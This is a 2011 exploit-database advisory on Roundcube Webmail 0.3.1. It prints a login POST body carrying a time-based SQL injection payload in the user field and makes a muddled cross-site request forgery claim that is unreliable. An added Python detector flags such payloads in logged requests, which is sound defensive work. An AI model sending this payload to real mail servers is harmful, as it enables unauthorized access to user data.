Roundcube Webmail 0.3.1 – Cross-Site Request Forgery / SQL Injection

  • Author: Smith Falcon
    Date: 2011-10-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17957/
  • # Exploit Title: RoundCube 0.3.1 SQL injection
    # Date: 10/10/2011
    # Author: Smith Falcon
    # Software Link: http://roundcube.net/download
    # Version: 0.3.1
    # Tested on: Linux
    
    The _timezone= parameter is vulnerable to SQL Union Injection.
    
    POST data sent to
    
    http://site.com/roundcube/index.php
    
    _pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"
    
    
    XRF (cross-site request forgery) vulnerable [ POC ]
    
    POST variable
    
    Changing the variable _action=login to "_action=anything" shows that the
    site is vulnerable to XRF attacks. When you replay the request with HTTP
    Live headers, you see a logged-in URL, which shows that Roundcube 0.3.1 is
    vulnerable to XRF attacks. Successful tampering will lead to username
    compromise.
    
    _action=loggedin
    
    Credits - iqZer0
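
For defenders reviewing captured login requests, the following added example (not part of the advisory and not Roundcube code) form-decodes a login POST body and flags the SQL constructs seen in the request above in the two fields the advisory names, `_user` and `_timezone`. The rule names and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Fields the advisory names: the payload sits in _user, and _timezone is
# reported as injectable.
WATCHED_FIELDS = ("_user", "_timezone")

# Hypothetical rule names; patterns cover the constructs in the advisory's request.
RULES = {
    "time_delay_call": re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "quote_then_boolean": re.compile(r"'\s*(?:or|and)\b", re.I),
}


def scan_login_body(body: str) -> list[tuple[str, str]]:
    """Return (field, rule) pairs for watched fields that match a rule.

    parse_qsl undoes form encoding ('+' -> space, %2C -> ','), so the rules
    see the value the application would receive, not the wire form.
    """
    hits = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field not in WATCHED_FIELDS:
            continue
        for name, pattern in RULES.items():
            if pattern.search(value):
                hits.append((field, name))
    return hits


# Request body as printed in the advisory.
ADVISORY_BODY = (
    "_pass=FrAmE30.&_url=_task=mail&_timezone=_default_"
    "&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login"
    "&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1\""
)
# Constructed benign login for comparison (apostrophe in the user name).
BENIGN_BODY = (
    "_pass=example&_url=_task=mail&_timezone=_default_"
    "&_token=00000000000000000000000000000000&_action=login&_user=o'connor"
)

if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, scan_login_body(body))
```

Pattern matching of this kind is a detection aid for log review; the fix for the injection itself is binding these fields as query parameters on the server side.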